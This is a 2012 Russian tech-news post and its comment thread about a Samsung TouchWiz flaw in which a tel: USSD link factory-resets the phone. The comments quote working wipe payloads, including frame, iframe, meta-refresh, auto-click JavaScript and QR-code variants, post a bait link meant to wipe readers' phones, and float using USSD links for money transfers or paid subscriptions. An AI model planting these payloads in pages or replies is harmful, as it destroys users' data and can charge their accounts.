Пользователь
0,0
рейтинг
25 сентября 2012 в 17:19

Одна строка HTML кода может удалить данные или перезагрузить телефоны Samsung

На конференции по безопасности продемонстрировали, как одной строкой HTML кода можно удаленно удалить данные с Samsung Galaxy S III. Хуже всего: это, кажется, работает на многих смартфонах Samsung с TouchWiz


Данная проблема специфична конкретно для телефонов Samsung, c установленной TouchWiz, а это большая часть линейки Samsung. Телефоны выпущенные без оболочки TouchWiz, не подвержены потенциальной опасности (к примеру на Galaxy Nexus эксплоит не работает).

На конференции было продемонстрировано как полученная на телефон ссылка особым образом обрабатывалась с помощью TouchWiz, в следствии чего с телефона удалялись данные. Данный эксплойт в виде строки HTML кода также может быть вызвать через встроенный сканер QR кодов или NFC.

Все заинтересованные могу ознакомиться с материалом более подробно по ссылке, в том числе и увидеть видео с примером применения эксплойта.
Сергей @Seldon
карма
0,0
рейтинг 0,0
Реклама помогает поддерживать и развивать наши сервисы

Подробнее
Реклама

Самое читаемое

Комментарии (146)

  • +55
    Кто протестировать может?
    <frame src="tel:*2767*3855%23" />
    • +108
      Зачем ты опубликовал это? У меня теперь телефон пустой, приходиться писать с холодильника, благо там важных файлов нет.
      • +97
        Холодильник Самсунг? Продукты не исчезли?
        • +38
          Они теперь read only?
          • +7
            надо вернуть рут и поставить cmod +x на продукты
            • +5
              Права доступа тут не причем.
              mount -o remount,rw /dev/refrigerator
              • +15
                Ом-ном-ном…
          • +4
            look-only
        • +14
          Он опытный владелец холодильника. Продукты примонтировал на отдельный раздел (в морозилку)
          • +4
            И делает бекапы в полочках двери )
      • –1
        А у меня после этого кот пропал. Кличка у кота была «iPhone», но получается, что он был на самом деле Samsung…
    • –30
      ну зачем же вы так? у меня от этого брат умер.
      • +2
        Брат Сэм по фамилии Суньк? :)
    • +1
      Вот гад
    • +17
      Вспомнил легендарный топик на ЛОРе… :)
      • 0
        Напомните нам, смертным.
        • +9
        • +14
          • 0
            Я буду обновлять комментарии…

            ps. зато у меня еще ссылка на лурк есть ;)
            • +17
              Хм. Очень интересно, что сегодня ровно 9 лет как запостили тот тред =)
      • +13
        а я вспомнил не менее легендарный rm -rf /usr
        • +3
          Написали бы прям тут.
          -rm -rf /usr /lib/nvidia-current/xorg/xorg
          +rm -rf /usr/lib/nvidia-current/xorg/xorg
        • +1
          Автор удалил коммит a047be85247755cdbe0acce6f1dafc8beb84f2ac, а в месте с ней и эпичную ветку комментариев страниц этак на 40, которая была похожа на филиал имиджборды, очень жаль, что не успел её куда нибудь сохранить.
    • НЛО прилетело и опубликовало эту надпись здесь
      • НЛО прилетело и опубликовало эту надпись здесь
        • +10
          Имхо было глупо не предполагать — «что некоторые вредоносные личности туда будут вставлять код сброса к заводским настройкам».
          • +9
            Вспомнилась история про хакера и солонку в столовой.
    • 0
      А в конце должно быть %23 или таки #?

      • 0
        %23 это урл
        • 0
          Ага, без него не работает (:
    • +2
      круто! сработало :)
    • +7
      Интересно, так сработает?
      QRCode
      • +4
        Нет:
        <img src="http://qr.kaywa.com/?s=8&d=tel%3A%2A2767%2A3855%2523" alt=«image»/>
        <img src="https://habrastorage.org/getpro/geektimes/comment_images/52e/d7b/053/52ed7b0535bc2cba8f6f179fc93eb92e.png" alt=«image»/>
        «%23» — это уже закодированный символ «#», а «%2523» кодирует текст «%23», что уже лишнее.
        image
        • 0
          Понял.
          Ну а теперь Ваш вариант бы опробовать… :)
        • 0
          Отсканировал через BlackBerry 9900, предложил позвонить, отправить смс и добавить к контактам
          • 0
            Тоже самое с HTC.
  • +1
    «Epic fail»
  • +5
    РЕШЕТО!
  • +5
    Зачем Apple судиться с Samsung?
    Одна строчка кода обеспечит приток покупателей :)
  • +87
    Самсунги то патч выпустят, а вот карты эплу всё равно долго ещё допиливать.
    • –20
      Какое количество блондикок, да и просто, обычных пользователей, применят этот патч? Предполагаю, что 90% пользователей даже не предполагают, что на телефон надо ставить «заплатки».
      • –1
        Не совсем понял минусующих, но как-то раз, в обществе людей не далеких от техники, завел разговор об обновлениях, патчах и тп. Так вот, оказалось, что из 12 человек, только двое, включая меня, устанавливают обновления и т.п. Повторюсь, это было в обществе людей, связанных с техникой.
        • +1
          Ничего, вот добрый Самсунг и подсуетился, после такого вайпа телефона небось некоторые начнут ставить)
          • +1
            Некоторые, да. Большинство тех, кто может столкнуться с этим багом пойдут в сервис-центр и/или поменяют телефон на другого производителя.
      • +3
        Все встало на свои места. Не являюсь владельцем девайса на Андроиде, и не знал о способах отображения приходящих уведомлений об обновлениях и патчах.
        Спасибо daspisch, разъяснил.

        Думаю что да, патчик быстро выпустят.
    • +6
      Ну ребята это нечестно! :) Обвиняете пользователей Apple что на любую недоработку, или необоснованное отсутствие фич, или плохие карты те говорят мол «Все ок! Apple знает что делает!», а вы кричите «Фанатики! Компания лажает а они слепы». А когда Samsung допустила такую ошибку в безопасности… всего-лишь HTML код…

      Этот недостаток на время, карты Apple тоже на время, хоть и большее. Но из-за них простой строчкой HTML вы не потеряете все свои файлы. Так что давайте будем честными — возможность стереть данные на вашем телефоне строчкой HTML кода это, извините, обо*****сь в Samsung. Являясь счастливым владельцем Nokia 1280 желаю скорейшего выхода патча для владельцев Samsung и хороших карт для владельцев Apple ;)
      • +8
        На айфонах не так давно джейлбрейк также применялся с помощью специальной веб-страницы. Ничего не мешало, в теории, вместо джейла засунуть туда какой-то зловредный код.
      • 0
        >Этот недостаток на время, карты Apple тоже на время, хоть и большее

        Если уж быть честными, то давайте будем честными до конца: сколько процентов пользователей айфонов столкнутся с проблемой отстойных карт? А сколько процентов пользователей Самсунга посетят зловредный сайт до того, как Самсунг залатает дырку? ;)
    • +1
      Ага-ага: «А у вас негров линчуют»
    • +1
      Ну зато пока карты фиксают реальный мир стёрт не был.
    • +16
      Я как владелец самсунга на стоковой прошивке считаю, что косяк с удалением данных с телефона куда посерьезнее, чем недоделанные карты. Что тут обсуждать то вообще? (: Это же очевидно.
      • +5
        Ну, если ехать по этому маршруту, то окончиться для водителя плачевней, чем потеря данных с телефона…
        • +3
          Для вождения автомобиля все таки права нужны, получение которых подразумевает знание правил дорожного движения, которые не позволят поехать как по жд путям, там и по прочим маршрутам которые может предложить навигатор.
        • +2
          Свои мозги ещё никто не отменял.
        • +3
          Ой, я тут навигатором в Италии пользовался, хертцевским «НеверЛост», он мне и с обрывов советовал «короткой дорогой» и под «кирпичи» и еще всякими разными глупостями заняться. Как видишь — живой. Дорогу то глазами видно (: Хотя разрадало, конечно, согласен, особенно в незнакомой стране. Но если мне qr-код вайп сделает, я буду чуть более чем раздражен, мягко говоря.
      • +1
        «на стоковой прошивке»
    • 0
      Тут интересно, как быстро этот матч дойдет до пользователей.
      Ставлю, что и через месяц большая часть телефонов будет непропатчена
  • –4
    Забавная картинка к новости. Много ключиков, а дырка одна. Вспоминаются школьные уроки из анатомии
  • 0
    Красиво.
  • +8
    HTC One X тоже уязвим. Только что на своем проверил.
    • 0
      Цена вопроса только у HTC1х есть хард ресет через USSD или нет?
    • 0
      Проверил, неуязвим, это у вас что-то другое...)
      • +1
        Проверьте тут: mk.am/m/ussd.html (:
        Он выдаст IMEI.
        • 0
          Ну пусть показывает IMEI, wipe-то не работает…
          • 0
            А вы уверены, что у HTC нет USSD кода для вайпа? Я — нет.
            • +1
              Ну, как найдете, дайте знать :)
              • +2
                Ну если он найдется вы и так узнаете (о;
              • 0
                Вот нашел: *#*#7780#*#*, не проверите на своем?
                • 0
                  *#767*3855# — А этот, если сработает, форматнет партишны ):
                  • 0
                    Проверил: «услуга не существует»… то же самое.
                • 0
                  Проверил: «услуга не существует».
                  • 0
                    Здорово, значит вам повезло.
      • 0
        На <frame не работает, вы правы. Но на <iframe как миленький.
  • +7
    Владельцам Samsung посвящается:
    Пользователи habrahabr не несут ответственность за любые потери, понесённые в результате посещения этой страницы и страницы ниже. Нажимая на кнопку, вы соглашаетесь потерять все данные на вашем смартфоне.

    Я ХОЧУ УДАЛИТЬ ВСЕ ДАННЫЕ СО СВОЕГО ТЕЛЕФОНА
    • +1
      У меня Firefox падает из-за это ссылки!
    • 0
      image
      • +10
        Можно разместить на входе в кинотеатр, например. Или там где принято отключать телефоны
        • +5
          А мне захотелось распечатать на футболку, меня побьют? :)
          • +1
            Лучше в виде граффити на стене у входа в кинотеатр. Сразу в зале воцарится тишина, способствующая созерцанию
            • 0
              тишина? скорее проклятия и чего похуже
            • 0
              Корпоративный кинотеатр Самсунга.
      • 0
        Поставил на аву Вконтакте — Glaxy S III готов
        • 0
          сбросило к заводским установкам
    • +1
      На Galaxy Nexus, просто открывается звонилка, там еще нужно нажать позвонить
  • 0
    Только что накидал тестовую страничку, проверить на GalaxyS 2 — работает. Так что аккуратней… В приведенном ниже примере — запрос IMEI.

    <html>
    <head>
    <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.8.1/jquery.min.js"></script>
    </head>
    <body>
    <a onclick="document.location='tel:*%2306%23'" id="link" />Call me</a>
    <script>
    $(document).ready(function() {
     $('#link').click();
    });
    </script>
    </body>
    </html>
    

    • +4
      Слабо берете. Делайте сразу запрос перевода денег ))
      • 0
        А ведь это идея…
        • 0
          Они обычно требуют подтверждения повторным USSD-запросом. Во всяком случае, на МТС Украина так.
    • +1
      Подгрузили jQuery, сделали ссылку с javascript'ом на onclick и по document.ready триггерите его? Да вы знатный извращенец :) Наверняка так тоже будет работать:

      <html><head><meta http-equiv="refresh" content="0; url=tel:*%2306%23" /></head><body></body></html>
      
      • 0
        Можно вообще в хэдер Location: закинуть и хостить на сокращалке ссылок is.gd/XhBdS7
  • 0
    Получается телефон не спрашивая переходит по такой ссылке?
    На десктопе пишет, что это может быть атакой злоумышленников и тд
  • +1
    Пишут, что надо отключить Service Loading в настройках SMS-приложения, чтобы избавиться от уязвимости.
    • 0
      По дефолту так, получается должно спрашивать
      • 0
        Картинка не вставилась
    • 0
      Как вариант можно поставить сторонний номеронабиратель, который может перехватывать такие обращения.
  • +4
    Ого, так тут не просто сброс к заводским настройкам:

    *2767*3855# — Полный сброс l EEPROM ( Этот код удаляет SP-блокиравку!) Но также изменяет IMEI на 447967-89-400044-0
    • +1
      USSD-запрос который изменяет IMEI? ...srsly?!
      • +4
        Да. Сам был очень удивлен.
        • 0
          В некоторых моделях Samsung IMEI хранится в перезаписываемой памяти, поэтому «потерять» IMEI (при перепрошивке, например) вполне реально. Впрочем, восстанавливается он тоже достаточно просто.
        • 0
          Есть легенда, что смена IMEI — преступление :)
  • +3
    На sgs3 с ICS 4.0.4 не работает. Дефолтный браузер открывает диалер, но он пустой. Мобильная опера попросту отказывается загружать такой фрейм.
    • –1
      под ics *#87976633#
      • 0
        Какая разница, какой код, если он больше не вставляется в диалер по ссылке/из сторонних приложений?
  • 0
    В догонку: forum.xda-developers.com/showthread.php?t=1904629
    Самсунг был предупрежден и дыры залатал (для S3, как минимум). А вот ХТЦ подвержен (хотя там вроде как нет кода на вайп).
  • 0
    Да весь патч должен быть в запрете набора IMEI через ссылки.
  • 0
    А на платные сервисы так можно подписать?
    • +1
      Если через USSD-запрос — то вполне, почему нет.
  • –3
    Надо встроить такой iframe в корпоративный портал :D
    • 0
      В Apple админом корпоративного портала работаешь?
  • +1
    Для старенького Galaxy S (i9100) на стоковой прошивке помогло установить Dialer One и теперь система спрашивает чем звонить. При просмотре страницы это настораживает и позволяет не попадаться.

    А вообще да, бяка страшная и не понятно как будут латать старые модели
    • 0
      Если поставить Dialer One дефолтным — тоже ничего страшного не произойдет. Он не набирает номер сразу, а лишь показывает его.
  • +1
    Создать платный сервис и контекстную рекламу запустить, с таргетингом на модель телефона. 100500% окупаемость.
  • –1
    На страничке, где вы это взяли, первой строкой стоит «on certain Samsung smartphones running Google’s Android software». Не могли бы вы добавить это тоже первой строкой? Я, конечно, понимаю, что нас не много «не Android пользователей смартфонов Samsung», но все же первой предложение полностью бы поставило все на свои места для меня, и я не стал бы дальше читать эту статью.
  • 0
    Galaxy 5500 cyogenmod 2.7 (TouchWiz отсутствует)- IMEI показал. Выходит любой ussd запрос можно без запроса пользователя отправить — «хороший» способ для подписки к «нужным» мобильным услугам…
  • 0
    А если нажать SADM, то можно увидеть мультик.
    Ну, посоны, кто помнит?
    • 0
      Select All Delete Marked в редакторе почты GoldED в Фидонете. Мне это и помнить не надо: у меня GoldED-NSF в соседнем окне открыт.
      • 0
        Ох, какие люди! Ну, видимо, никто больше уж точно про SADM не знает.
  • 0
    Достал из чулана спику, и она тоже…
    Самсунг назовет эту фича S Wipe
  • +2
    Вспомнилось как старенькие телефоны Siemens напрочь висли от SMSки "%English". Потом была еще проблема эти смски удалять.
    • 0
      Достал. Попробовал. Действительно так.
  • 0
    Galaxy Note стоковая 4.0.4 — не работает.
    Получается в S3 и Note уже исправили обновлением на прошлой неделе.
  • +1
    в мегафоне точно можно сделать перевод бабла с номера на номер через ussd
  • –1
    Эх!
    Жаль нет такого аппарата — я бы первым делом побежал проверять (
  • 0
    Galaxy SL, cyanogen-10 (andr 4.1)
    не работает, только текст вставляет.
    (ну, правда, ещё вайфай тоже не работает и некоторые приложения глючат)
  • –1
    Нв самом деле дело тут не в самсунге.

    Проблема в стоковом браузере андроида, который позволяет напрямую выполнять USSD команды. Соответственно, если телефон позволяет ussd командой сделать вайп, то оно будет работать. (Ну, или перевести деньги на другой телефон).
    Есть подтверждения о HTC hero c 2.1, HTC Tattoo с 1.6, HTC Desire и так далее
    В более поздних версиях видимо это поправили, потому что в последних прошивках S3 и Note эксплоит не работает.
    • 0
      Дело не в браузере. В видео аналогичную операцию выполняли с помощью push-message и nfc-тага. Проблема именно в звонилке, которая не требует нажатия на вызов, а выполняет команду когда видит # (да и вообще принимает ussd-номера от сторонних приложений).
  • +1
    Осталось добавить этот html код на apple.com :)
  • 0
    Проверил на galaxy ace — работает, правда, только со второго клика, при первом просто открылась звонилка с этим кодом.
  • 0
    Хм. А где же классический комментарий «Вот ведб тупые разработчики! Как такое можно было допустить! У них что, QA не работает? Элементарно же».

    А, стоп. Это топик про Андроид и Самсунг. Теперь понятно…
  • +5
    Наконец-то практичная аватарка для хабра
  • 0
    Samsung Captivate, работает. Однако только при использовании стандартного браузера, Opera Mobile блокирует.
  • 0
    Samsung Galaxy Spica i5700 — ссылка на *#06# сработала, на хардресет даже пробовать не буду :)
    Никакого Touch Wiz там, естественно, еще не было, более того — CyanogenMod 7 стоит.
    • +1
      Китайский телефон thl W3+ тоже работает. Запускал из Firefox. Мне уже страшно ходить в интернет с телефона, а то вдруг вставят такой код и вайпнешь свой смартфон =(
  • +2
    Не совсем ясно почему в заголовке до сих пор фигурирует только Samsung — дыры то и у HTC с CyanogenMod-ом аналогичные.

    Тем временем уже сделали костыль. play.google.com/store/apps/details?id=org.mulliner.telstop
  • 0
    Похоже, что ошибки типа «con\con» никогда не переведутся.
  • 0
    image a так?
    • 0
      Увы, хабр не принимает альтернативные протоколы
  • 0
    Всё-таки за это фи Самсунгу, ибо надо спрашивать подтверждения на выполнение таких действий. Код то этот я раньше уже использовал при перепрошивке, и меня очень удивляло отсутствие вопросов, как это бывает на других телефонах.
  • 0
    по ссылке можно скачать прогу, которая не позволяет просто так запускать эксплойты с энтэрнетов
  • 0
    это еще фигня.

    а вот как им простить баг в чипах eMMC на 90% устройств Galaxy S II, который при data wipe тупо превращает телефон в суперкирпич?
    • 0
      90%?? Я два телефона сначала убил по незнанию (одному и тому же владельцу), а «рабочий» аппарат нормальный попался, без баги.
      Ещё вспоминаются планшеты, где при любом доступе к одному из системных файлов (в т.ч. листинг папки) блочил сенсорный экран намертво, чуть ли не перепрошивка требовалась (шум поднялся из-за dr.web, который при сканировании читал этот файл и убивал девайс).
      • 0
        Если гарантия еще есть, то самсунг спокойно поменяет вам материнскую плату на ту, которая уже с нормальным чипом.
        • 0
          Гарантия была, в сервисе поменяли плату за пару дней (похоже, плат у них там с запасом). Но, всё ещё не зная о проблеме (в первый раз аппарат глючил сам по себе, списали на очередной глюк), попробовал ещё раз сменить прошивку, с тем же результатом, то есть чип опять попался глючный. С другой стороны, есть и положительный момент: после двух обращений в сервис по одной и той же проблеме, магазин вернул деньги, что почти полностью покрыло покупку sgs3 там же.
          • 0
            В маркете есть софтина emmc brick bug check, которая как раз проверяет на наличие этого бага

Только зарегистрированные пользователи могут оставлять комментарии. Войдите, пожалуйста.